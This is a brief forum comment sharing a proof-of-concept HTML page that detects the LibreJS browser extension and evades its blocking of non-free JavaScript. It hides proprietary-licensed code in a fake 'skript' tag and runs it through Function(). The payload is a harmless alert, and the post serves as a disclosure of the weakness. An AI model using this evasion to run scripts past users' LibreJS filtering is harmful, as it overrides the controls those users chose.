3 ms·
I expect this bullshit still works: https://rya.nc/files/librejs-poc.html https://rya.nc/files/librejs-poc.html <script id="harmlessNullScript" type="text
by ryan-c 2y ago
I expect this bullshit still works:
https://rya.nc/files/librejs-poc.html https://rya.nc/files/librejs-poc.html
<script id="harmlessNullScript" type="text/javascript"></script>
<skript id="derp" style="display:none;">
/**
* @license Proprietary
* @copyright Copyright 2018 Ryan Castellucci, All Rights Reserved
*/
// WARNING: Code here needs to avoid the "less than" symbol.
(function(){
// LibreJS modifies the text of script tags onced they've been
// checked, which offers a very convienant way to detect it.
if (harmlessNullScript.textContent.indexOf("LibreJS: ") > 0) {
eval("alert('LibreJS detected, but non-free eval works');");
}
})();
</skript>
<script type="text/javascript">
/**
* @license Proprietary
* @copyright Copyright 2018 Ryan Castellucci, All Rights Reserved
*/
// An eval that works in the WebExtension port of LibreJS.
// Untested on the original XPI version.
Function(derp.textContent)();
</script>
In any event, there are a lot of ways to eval code...